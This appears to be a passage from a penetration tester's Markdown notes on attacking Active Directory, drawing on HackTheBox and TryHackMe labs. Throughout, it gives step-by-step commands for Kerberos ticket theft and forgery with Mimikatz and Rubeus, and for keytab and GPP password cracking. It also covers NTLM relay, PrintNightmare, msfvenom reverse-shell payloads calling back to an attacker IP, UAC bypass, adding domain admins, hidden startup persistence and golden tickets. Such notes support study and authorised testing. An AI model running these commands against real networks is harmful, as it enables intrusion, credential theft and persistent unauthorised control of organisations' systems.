- Perform the kerberos delegation attack with [kekeo](https://github.com/gentilkiwi/kekeo) `kekeo.exe`
- `tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:redacted` generate a TGT that can be used to generate tickets for the HTTP and WSMAN services
- user - The user who has the constrained delegation permissions.
- domain - The domain that we are attacking since Kekeo can be used to forge tickets to abuse cross-forest trust.
- password - The password associated with the svcIIS account.
- `/user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc` forge TGS requests for the account we want to impersonate. We need to perform this for both HTTP and WSMAN to allow us to create a PSSession on THMSERVER1
- tgt - We provide the TGT that we generated in the previous step.
- user - The user we want to impersonate. Since t2 accounts have administrative access over workstations, it is a safe assumption that t1 accounts will have administrative access over servers, so choose a t1_ account that you would like to impersonate.
- service - The services we want to impersonate using delegation. We first generate a TGS for the HTTP service. Then we can rerun the same command for the WSMAN service. `tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc`
- Import the tickets with Mimikatz
```dos
privilege::debug
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
```
- You can run `klist` to check that the tickets were imported
- We just need to create our session in our target
## Bruteforce users with kerbrute
- Get kerbrute [here](https://github.com/ropnop/kerbrute)
- If you do not have creds yet but see kerberos in the list of ports, it is worth trying to enumerate users with a wordlist using kerbrute
- `./kerbrute_linux_amd64 userenum -d timelapse.htb --dc 10.10.11.152 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt`
> Note: There's a lot of other things you can do with kerberos
## Pass the Ticket from Windows
> Reminder: We need local admin rights.
> To collect all tickets we need to execute Mimikatz or Rubeus as an administrator.
We need a valid Kerberos ticket to perform a Pass the Ticket (PtT). It can be:
- Service Ticket (TGS - Ticket Granting Service) to allow access to a particular resource.
- Ticket Granting Ticket (TGT), which we use to request service tickets to access any resource the user has privileges.
### Mimikatz - Exports Tickets
```cmd
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
```
The tickets that end with $ correspond to the computer account, which needs a ticket to interact with the Active Directory. User tickets have the user's name, followed by an @ that separates the service name and the domain, for example: `[randomvalue]-username@service-domain.local.kirbi`.
> Note: If you pick a ticket with the service krbtgt, it corresponds to the TGT of that account.
### Rubeus - Export Tickets
```cmd
Rubeus.exe dump /nowrap
```
### Pass the Key or OverPass the Hash
The traditional Pass the Hash (PtH) technique involves reusing an NTLM password hash that doesn't touch Kerberos. The Pass the Key or OverPass the Hash approach converts a hash/key (rc4_hmac, aes256_cts_hmac_sha1, etc.) for a domain-joined user into a full Ticket-Granting-Ticket (TGT). This technique was developed by Benjamin Delpy and Skip Duckwall in their presentation [Abusing Microsoft Kerberos - Sorry you guys don't get it](https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it/18). Also Will Schroeder adapted their project to create the [Rubeus](https://github.com/GhostPack/Rubeus) tool.
To forge our tickets, we need to have the user's hash; we can use Mimikatz to dump all users Kerberos encryption keys using the module sekurlsa::ekeys.
### Mimikatz - Extract Kerberos Keys
```cmd
mimikatz.exe
privilege::debug
sekurlsa::ekeys
```
Now that we have access to the AES256_HMAC and RC4_HMAC keys, we can perform the OverPass the Hash or Pass the Key attack using Mimikatz and Rubeus.
### Mimikatz - Pass the Key or OverPass the Hash
```cmd
mimikatz.exe
privilege::debug
sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f
```
This will create a new cmd.exe window that we can use to request access to any service we want in the context of the target user.
To forge a ticket using Rubeus, we can use the module asktgt with the username, domain, and hash which can be /rc4, /aes128, /aes256, or /des. In the following example, we use the aes256 hash from the information we collect using Mimikatz sekurlsa::ekeys.
### Rubeus - Pass the Key or OverPass the Hash
```cmd
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrap
```
> Note: Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't.
### Pass the ticket
Now that we have some Kerberos tickets, we can use them to move laterally within an environment.
With Rubeus we performed an OverPass the Hash attack and retrieved the ticket in base64 format. Instead, we could use the flag /ptt to submit the ticket (TGT or TGS) to the current logon session.
```cmd
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /ptt
```
Another way is to import the ticket into the current session using the .kirbi file from the disk.
```cmd
Rubeus.exe ptt /ticket:[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi
```
We can also use the base64 output from Rubeus or convert a .kirbi to base64 to perform the Pass the Ticket attack. We can use PowerShell to convert a .kirbi to base64.
```powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"))
```
Using Rubeus, we can perform a Pass the Ticket providing the base64 string instead of the file name.
```cmd
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/
```
Finally, we can also perform the Pass the Ticket attack using the Mimikatz module kerberos::ptt and the .kirbi file that contains the ticket we want to import.
```cmd
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"
```
> Note: Instead of opening mimikatz.exe with cmd.exe and exiting to get the ticket into the current command prompt, we can use the Mimikatz module misc to launch a new command prompt window with the imported ticket using the misc::cmd command.
### Pass The Ticket with PowerShell Remoting (Windows)
#### Mimikatz
To use PowerShell Remoting with Pass the Ticket, we can use Mimikatz to import our ticket and then open a PowerShell console and connect to the target machine. Let's open a new cmd.exe and execute mimikatz.exe, then import the ticket we collected using kerberos::ptt. Once the ticket is imported into our cmd.exe session, we can launch a PowerShell command prompt from the same cmd.exe and use the command Enter-PSSession to connect to the target machine.
```cmd
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
exit
powershell
Enter-PSSession -ComputerName DC01
```
#### Rubeus
Rubeus has the option createnetonly, which creates a sacrificial process/logon session (Logon type 9). The process is hidden by default, but we can specify the flag /show to display the process, and the result is the equivalent of runas /netonly. This prevents the erasure of existing TGTs for the current logon session.
```cmd
# Create a Sacrificial Process with Rubeus
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
```
The above command will open a new cmd window. From that window, we can execute Rubeus to request a new TGT with the option /ptt to import the ticket into our current session and connect to the DC using PowerShell Remoting.
```cmd
# Pass the Ticket for Lateral Movement
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /ptt
powershell
Enter-PSSession -ComputerName DC01
```
## Pass the Ticket (PtT) from Linux
> Source: HTB Academy
Although not common, Linux computers can connect to Active Directory to provide centralized identity management and integrate with the organization's systems, giving users the ability to have a single identity to authenticate on Linux and Windows computers.
A Linux computer connected to Active Directory commonly uses Kerberos as authentication. Suppose this is the case, and we manage to compromise a Linux machine connected to Active Directory. In that case, we could try to find Kerberos tickets to impersonate other users and gain more access to the network.
A Linux system can be configured in various ways to store Kerberos tickets.
> Note: A Linux machine not connected to Active Directory could use Kerberos tickets in scripts or to authenticate to the network. It is not a requirement to be joined to the domain to use Kerberos tickets from a Linux machine.
### Kerberos on linux
Windows and Linux use the same process to request a Ticket Granting Ticket (TGT) and Service Ticket (TGS). However, how they store the ticket information may vary depending on the Linux distribution and implementation.
In most cases, Linux machines store Kerberos tickets as [ccache files](https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html) in the /tmp directory. By default, the location of the Kerberos ticket is stored in the environment variable KRB5CCNAME. This variable can identify if Kerberos tickets are being used or if the default location for storing Kerberos tickets is changed. These ccache files are protected by reading and write permissions, but a user with elevated privileges or root privileges could easily gain access to these tickets.
Another everyday use of Kerberos in Linux is with keytab files. A [keytab](https://kb.iu.edu/d/aumh) is a file containing pairs of Kerberos principals and encrypted keys (which are derived from the Kerberos password). You can use a keytab file to authenticate to various remote systems using Kerberos without entering a password. However, when you change your password, you must recreate all your keytab files.
Keytab files commonly allow scripts to authenticate automatically using Kerberos without requiring human interaction or access to a password stored in a plain text file. For example, a script can use a keytab file to access files stored in the Windows share folder.
> Note: Any computer that has a Kerberos client installed can create keytab files. Keytab files can be created on one computer and copied for use on other computers because they are not restricted to the systems on which they were initially created.
### Identifying Linux and Active Directory Integration
We can identify if the Linux machine is domain joined using [realm](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/windows_integration_guide/cmd-realmd), a tool used to manage system enrollment in a domain and set which domain users or groups are allowed to access the local system resources.
- `realm list` Check If Linux Machine is Domain Joined
In case realm is not available, we can also look for other tools used to integrate Linux with Active Directory such as [sssd](https://sssd.io/) or [winbind](https://www.samba.org/samba/docs/current/man-html/winbindd.8.html).
- `ps -ef | grep -i "winbind\|sssd"` PS - Check if Linux Machine is Domain Joined
### Finding Kerberos Tickets in Linux
As an attacker, we are always looking for credentials. On Linux domain joined machines, we want to find Kerberos tickets to gain more access. Kerberos tickets can be found in different places depending on the Linux implementation or the administrator changing default settings.
### Finding Keytab Files
A straightforward approach is to use find to search for files whose name contains the word keytab. When an administrator commonly creates a Kerberos ticket to be used with a script, it sets the extension to .keytab. Although not mandatory, it is a way in which administrators commonly refer to a keytab file.
- `find / -name *keytab* -ls 2>/dev/null` Search for Files with Keytab in the Name
> Note: To use a keytab file, we must have read and write (rw) privileges on the file.
- `crontab -l` Identifying Keytab Files in Cronjobs
### Finding ccache Files
A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts. Once a user authenticates to the domain, a ccache file is created that stores the ticket information. The path to this file is placed in the KRB5CCNAME environment variable. This variable is used by tools that support Kerberos authentication to find the Kerberos data.
- `env | grep -i krb5` Reviewing Environment Variables for ccache Files
- `ls -la /tmp` Searching for ccache Files in /tmp
### Abusing KeyTab Files
As attackers, we may have several uses for a keytab file. The first thing we can do is impersonate a user using kinit. To use a keytab file, we need to know which user it was created for. klist is another application used to interact with Kerberos on Linux. This application reads information from a keytab file.
- `klist -k -t` Listing keytab File Information
```bash
# Impersonating a User with a keytab
klist
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
klist
# Connect to `\\dc01\carlos`
smbclient //dc01/carlos -k -c ls
```
> Note: To keep the ticket from the current session, before importing the keytab, save a copy of the ccache file present in the enviroment variable KRB5CCNAME.
### Keytab Extract
The second method we will use to abuse Kerberos on Linux is extracting the secrets from a keytab file. We were able to impersonate Carlos using the account's tickets to read a shared folder in the domain, but if we want to gain access to his account on the Linux machine, we'll need his password.
We can attempt to crack the account's password by extracting the hashes from the keytab file with [KeyTabExtract](https://github.com/sosdave/KeyTabExtract)
```bash
# Extracting Keytab Hashes with KeyTabExtract
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
```
With the NTLM hash, we can perform a Pass the Hash attack. With the AES256 or AES128 hash, we can forge our tickets using Rubeus or attempt to crack the hashes to obtain the plaintext password.
> Note: A keytab file can contain different types of hashes and can be merged to contain multiple credentials even from different users.
The most straightforward hash to crack is the NTLM hash. We can use tools like Hashcat or John the Ripper to crack it. However, a quick way to decrypt passwords is with online repositories such as [crackstation](https://crackstation.net/), which contains billions of passwords.
```bash
# Once we get the password we can log in as the user
su - carlos@inlanefreight.htb
klist
```
### Abusing Keytab ccache
## Resources
- https://lisandre.com/archives/14538
- https://youtu.be/lJQn06QLwEw?si=RqHthyeIW8b0kS6x
# GPP / cPassword Attacks Overview - MS14-025
- GPP will keep passwords in an XML file
- Works with smb
- If we find a 334 open we can try to login anonymously
*Example from HTB - Active - Retired Machine*
- Tips: `prompt off` (will not prompt when dl file) and `recurse on` (will list everything)
```
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
5217023 blocks of size 4096. 260455 blocks available
smb: \> prompt off
smb: \>
```
- We can get all the file using `mget *`
- We are interested in the group.xml file which has been downloaded in `active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/`
- We can just copy cpassword and crackit using gpp-decrypt: ` gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ`
And we get the password: `GPPstillStandingStrong2k18`
## HTB - Active - privesc
- The password obtain with gpp only gave us user. To root the machine we use kerberoasting again:
```
┌──(kali㉿kali)-[~]
└─$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40 2022-02-11 16:21:53
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$50b[STRIPPED]1
```
- We can then crack the password with hashcat
```
┌──(root💀kali)-[~/active-directory]
└─# hashcat -m 13100 hashkerb.txt /usr/share/wordlists/rockyou.txt -O
[STRIPPED]
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4[STRIPPED]1:Ticketmaster1968
```
- And finally get shell using psexec.py (Impacket)
```
┌──(root💀kali)-[~/active-directory]
└─# psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
```
## GPP - Resources
- https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
# URL File Attack
- If we have a user that has all kind of share access we can add this to one of the shares
```
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\ATTACKER-IP\%USERNAME%.icon
IconIndex=1
```
- We have to save it as `"@test.url"` or `"~test.url"`
- We launch responder in our attacking machine `responder -I eth0 -v`
- We get NTLMv2 hashes
## URL File Attack - Resources
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share
# PrintNightmare
## PrintNightmare (CVE-2021-1675) - RCE
- Takes advantage of printer spooler that runs as sys priv
- Check if our target is vulnerable `rpcdump.py @DOMAIN-CONTROLLER-IP | egrep 'MS-RPRN|MS-PAR'`
- Create a malicious dll to run it along the py file from the resource `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKING-MACHINE-IP LPORT=4444 -f dll > shell.dll`
```
┌──(root💀kali)-[/home/kali]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.8 LPORT=4444 -f dll > shell.dll 2 ⨯
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 8704 bytes
```
- run `msfconsole` to catch the shell `use multi/handler` `set payload windows/x64/meterpreter/reverse_tcp` set LHOST and LPORT
- setup a file share with smbserver.py (Impacket): `smbserver.py share 'pwd' -smb2support` (will share current working dir)
- Run the exploit `python3 exploit.py domain.local/username:password@DOMAIN-CONTROLLER-IP-ADD '\\ATTACKING-MACHINE-IP\share\shell.dll'`
- We should get a shell
*Note: With patches it might be necessary to use obfuscations techniques*
## PrintNightmare - LPE
- Create an user admin from the compromised machine:
```
*Evil-WinRM* PS C:\Users\user\Documents> Import-Module .\CVE-2021-1675.ps1
[STRIPPED]
*Evil-WinRM* PS C:\Users\user\Documents> Invoke-Nightmare -NewUser "adminhackr" -NewPassword "adminhackr1!" -DriverName "PrintMe"
[STRIPPED]
[+] created payload at C:\Users\user\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_19a3fe50fa9a21b6\Amd64\mxdwdrv.dll"
[+] added user adminhackr as local administrator
[+] deleting payload from C:\Users\user\AppData\Local\Temp\nightmare.dll
```
- We launch evilwinrm with this new user and we have an admin shell:
```
┌──(kali㉿kali)-[~]
└─$ proxychains evil-winrm -i 172.16.2.5 -u adminhackr -p adminhackr1! 76 ⨯
[STRIPPED]
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... 172.16.2.5:5985 ... OK
*Evil-WinRM* PS C:\Users\adminhackr\Documents>
```
### PrintNightmare - Resources
- https://github.com/cube0x0/CVE-2021-1675
- https://github.com/calebstewart/CVE-2021-1675
- https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html#target
- https://themayor.notion.site/d7a4f698bd2d453cbb55a60c6458542e?v=ec41d2f3c44743949e47237c03e82b1b&p=136a31bb0933493d852f3b9d38e8544f
# The Printer Bug
## What is it
The printer bug is a "feature" of the MS-RPRN protocol (PrintSystem Remote Protocol), which allows a domain user to remotely force a target host running the Print Spooler service to authenticate to an arbitrary IP address. There have been a few of these bugs in recent years: Spooler, PetitPotam, PrintNightmare. Microsoft claims that the only bug is that some of these did not require AD credentials at all, but this issue has been resolved through security patches.
Therefore, to exploit this, apart from machine account administrative privileges, we also need to meet the following four conditions :
1. A valid set of AD account credentials.
2. Network connectivity to the target's SMB service.
3. The target host must be running the Print Spooler service.
4. The hosts must not have SMB signing enforced.
## Check requirements
- In Powershell `GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc` See if Print Spooler service is running or `Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc`
- Check SMB Signing `nmap --script=smb2-security-mode -p445 `
## Attack
- Set up the NTLM relay `python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"" -debug`
- From our compromise host we use [SpoolSample](https://github.com/leechristensen/SpoolSample) `SpoolSample.exe THMSERVER2.za.tryhackme.loc "IP of your Attacking machine"`
- Some hashes should start to drop
- We can then connect with psexec `python3.9 /opt/impacket/examples/psexec.py thmdc.za/ServerAdmin@10.200.83.201 -hashes HASH:HASH`
-It is also possible to make a command with ntlmrelay like this `python3.9 ntlmrelayx.py -smb2support -t smb://"" -c 'whoami /all' -debug`
## Resources
- [TryHackMe - Exploiting AD - Task 4](https://tryhackme.com/room/exploitingad)
# AutoLogon
## Target requirements
- The target need to have those values in the registry in `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon`
- AutoAdminLogon set to 1
- DefaultDomainName with a valid domain set
- DefaultUserName with a valid admin username
- DefaultPassword with a valid admin pass
This basically means that the target when restarted will logon automatically without prompting for username and password.
## Exploitation
- You should have a shell with covenant or metasploit or netcat.
We will use Covenant here.
### Covenant with PowerUp
- In the shell we will type PowerShellImport, type enter and fetch PoweUp.ps1 (if you do not have it you can get it [here](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) )
- Click on execute
- type `powershell invoke-allchecks` in your shell
- Once the command executed it will do all sorts of check and we should see something like this:
```
[*] Checking for Autologon credentials in registry...
DefaultDomainName : domain
DefaultUserName : f.lastanme
DefaultPassword : password
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
```
### Covenant with Seatbelt
- Check for it with `Seatbelt WindowsAutoLogon`
```
====== WindowsAutoLogon ======
DefaultDomainName : domain
DefaultUserName : f.lastanme
DefaultPassword : password
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
```
## Resources
- https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers
# AlwaysInstallElevated Exploitation
## Target requirements
- The target needs to have those values in the registry:
- In `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer` with the AlwaysInstallElevated set to 1
- In `Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer` with the AlwaysInstallElevated set to 1
This means that installation packages are installed with elevated privileges
### Enumerate with cmd
- Type `reg query HKLM\Software\Policies\Microsoft\Windows\Installer` in a cmd prompt should be set to 1
- Type `reg query HKCU\Software\Policies\Microsoft\Windows\Installer` should be one as well
## Exploitation
- You should have a shell with covenant, metasploit or netcat or an access to the target.
We will use Covenant and Metasploit here.
### Covenant
#### Enumerate with SharpUp audit
- In your shell type `SharpUp audit`
- In the results you should see this:
```
=== AlwaysInstallElevated Registry Keys ===
HKLM: 1
HKCU: 1
```
#### Enumerate with powerup
- In the shell we will type PowerShellImport, type enter and fetch PoweUp.ps1 (if you do not have it you can get it [here](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) )
- Click on execute
- Type `powershell invoke-allchecks` in your shell
- We should see this
```
[*] Checking for AlwaysInstallElevated registry key...
AbuseFunction : Write-UserAddMSI
```
#### Exploitation
- generate a payload with msfvenom `msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi` between the quotes copy and paste an encoded launcher.
- Upload your file in the target using Upload command from covenant (type `Upload` and enter, file the file path for the target and browse to the file in your attack machine)
- run it using `shell msiexec /quiet /qn /i exploitalwaysinstalled.msi
- We should get a prompt for another reverse shell in our grunts as an elevated user
```
> whoami
NT AUTHORITY\SYSTEM
```
#### Exploitation with powerup
- `powershell -ep bypass`
- `. .\PowerUp.ps1`
- `Write-UserAddMSI`
- It will set up a malicious MSI called `UserAdd`
- And we will be able to add a user
- Our user has been added
### Metasploit
- Interact with a session you should already have from initial foothold `sessions -i num-of-session`
#### Enumerate
- Launch `run post/multi/recon/local_exploit_suggester`
- You should see: `- exploit/windows/local/always_install_elevated: The target is vulnerable.`
#### Exploitation
- Background your session with ctrl z
- Type `use exploit/windows/local/always_install_elevated`
- set session to the number of the session you have on your target
- type `exploit -j`
- list the sessions you should have another one running as authority system
- type ps and look for a process under session 1 so that we can migrate to it
- We can use winlogon.exe ` 620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe`
- Migrate to it using `migrate PID-number` in our example it is going to be `migrate 520`
**OR**
- `msfconsole`
- `use multi/handler`
- `set payload windows/meterpreter/reverse_tcp`
- `set lhost your-Kali-IP`
- `run`
- In another console tab `msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi`
- Get the generated msi in your target (python server -> browser from target)
- In your target Place `setup.msi` in a folder where you have write access
- Open command prompt and type: `msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi`
- You should get an elevated shell in msfconsole
### Other way
- Generate a malicious MSI package `msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi`
- Set up a listener `rlwrap nc -lnvp CHOSEN-PORT`
- Upload it to the target and execute it from the cmd `msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart`
- You should get an elevated shell
## Resources
- https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers
# UAC Bypass
- We assume that we already have a shell on the target
## With Covenant
- Get the helper.ps1 script with Powershell Import
- Copy an encoded launcher from the Launchers session of Covenant
- Type this command and append it with your launcher and close the quote `PowerShell helper -custom "cmd.exe /c "`
- You will get a shell as the same user but your shell will be in an administrative user context
- If you type `ps` you should be able to see also admin process
- To have an admin shell we can download a grunt as a shellcode
- To do so, We go to grunt we select shellcode we click on generate and we download the bin
- Then back on the shell, we Type `inject` in the most recent shell and select the binary then use a process number with admin privileges click on execute
- We should have a shell as system
## With Metasploit
- Interact with the current session using `session -i id-of-session`
- type `run post/multi/recon/local_exploit_suggester `
- We should see in the list this if the target is vulnerable
```
[+] 192.168.3.4 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 192.168.3.4 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
```
- Ctrl Z the session
- `use exploit/windows/local/bypassuac_dotnet_profiler`
- set the session to the id of the one we have on the target
- and then exploit -j
- We should have a new session
- We are not admin yet but we have and administrative user context
- List processes using `ps` and find one with admin rights remember the process id
- type `migrat process-id`
- if you type `getuid` you should have authority system
## Resources
- To understand more about Fodhelper
- https://tcm-sec.com/bypassing-defender-the-easy-way-fodhelper/
- https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers
# Abusing ACL
## GenericAll
- If a user has GenericAll access over a group on a domain, "it allows them to directly modify group membership of the group."
So we could add our user to a group that has more rights on the domain to make our way to Domain Admin.
` net group groupname f.lastname /add /domain`
- If a user has GenericAll rights over a user it is possible to try to Force Change password *Note: our current user is f.lastname1 and the user we have genericAll rights over is f.lastname2*
`$SecPassword = ConvertTo-SecureString 'SafePassword1!' -AsPlainText -Force`
`$cred = New-Object System.Management.Automation.PSCredential('domain\f.lastname1', $SecPassword)`
`$UserPass = ConvertTo-SecureString 'NewSafePass1!' -AsPlainText -Force`
`Set-DomainUserPassword -Identity f.lastname2 -AccountPassword $UserPass -Credential $cred` *Note: This is a PowerView Function*
- If the previous command as successfully completed (this would usually no error outputed usally you would have any output after a successful command)
- We can check with a remote powershell that we were successful `Enter-PSSession -ComputerName dc01 -Credential domain\f.lastname2`
## WriteDacl
- This means our user can grant themselve any privilege they want on the object. *Understand here that we can grand ourselves domain admin"*
`net group "Domain admins" f.lastname /add /domain`
## Resources
- https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#genericall
# Unconstrained Delegation
- This means that the computer is trusted to delegate any service.
## Enumeration
- Here we assume we have a high integrity grunt in Covenant with a computer that has unconstrained delegation, we can check this using this command:
`powershell get-netcomputer -unconstrained -properties dnshostname`
Here is what the result looks like, so we have Workstation-01 that has unconstrained Delegation
```
dnshostname
-----------
DC01.domain.local
WORKSTATION-01.domain.local
```
## Exploitation
- We upload ms-rprn.exe with the Covenant `upload` command to our target
- We run it `shell ms-rprn.exe \\dc01 \\workstation-01`
- run `rubeus dump /service:krbtgt` here we will want to copy and keep aside the DC01 Base64EncodedTicket
- `maketoken adminsitrator domain type-any-string-here`
- `rubeus ptt /ticket PASTE-HERE-DC01-Base64EncodedTicket`
- We should now be able to create a new user and add it to the Domain Admins
```
shell net user user SafePass1! /add /domain
shell net group "Domain Admins" user /add /domain
```
- `dcsync domain\krbtgt` We will need this if we want to do a golden ticket
# Persistence
Here we assume we have a shell with administrative privileges on the target
## Create a new user
### Covenant
- Select Interact in your grunt
- Use `shellcmd net users username password /add` (Note: for a real context engagement we need to make a safe password and a recognizable username such as the name of the company we work for)
- we can check that the user has been successfully added using `shell net users`
- Now we need to add our user to the administrators group using `shell net localgroup administrators username /add`
## Startup Persistence
### Covenant
- This method will ibject a payload in the startup tasks
- In your grunt go to the tab Task in the GruntTask list choose `PersistStartup`
- You should see this in the Payload input: `powershell -Sta -Nop -Window Hidden -EncodedCommand ` replace the blah with a powershell encoded launcher and click on Task
- If we restart the target machine and login again there we should get our shell back
***Note: Windows Defender is really efficient in detecting this so you might have to try different things for AV evasion***
## Autorun Persistence
### Covenant
- Go to launcher, select `Binary Launcher` Generate one and Download it
- Go back to your high integrity grunt, go to the task tab
- In the GruntTack Select `PersistAutorun`, choose a directory in where to upload the binary
- Go to the interact tab type Upload put the Directory in the file path and select the bin file you download previously
- You can check if the bin was successfuly added to the Registry using this cmd: `GetRegistryKey HCKU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- Once you restart you should have a shell back
***Note: Windows Defender is really efficient in detecting this so you might have to try different things for AV evasion***
## Persistence with RDP
- With an initial shell on a machine with covenant
- Enable Remote Desktop in our target: in the interact tab we can type this `powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"`
- We could then connect to the target using rdp and disabling anti-virus this way
- Disable Remote Desktop Commection: `powershell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f; Disable-NetFirewallRule -DisplayGroup "Remote Desktop"`
## Golden Ticket Persistence
- Here we will powershell along with powerview.ps1 and invoke-mimikatz.ps1
- `. .\powerview.ps1`
- `Get-DomainSID` this will give us the domain SID, we will need to copy it
- `. .\invoke-mimikatz.ps1`
- `Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:domain.local /sid:PUT-THE-SID-HERE /krbtgt:PUT-HERE-TICKET-OF-DC-KRBTGT /ptt"'`
